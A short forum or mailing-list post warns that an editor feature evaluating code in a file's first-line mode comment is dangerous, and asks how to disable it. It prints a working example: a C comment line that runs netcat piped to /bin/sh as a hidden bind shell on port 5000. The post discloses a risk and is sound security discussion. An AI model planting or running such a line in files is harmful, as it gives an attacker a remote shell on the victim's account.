Isn't this feature rather dangerous? 

I could send you a C file asking you to have a look at it, and have
the first line be:
/* -*- eval: system("(nc -l -p 5000 | /bin/sh)&")+set_line_hidden(1); -*- */

And hey presto I'd have access to your account and you wouldn't know
unless you happened to be very observent about the line numbers (which
sign can ofcourse be circumvented too).

On a slightly related note, how do you turn this feature off?
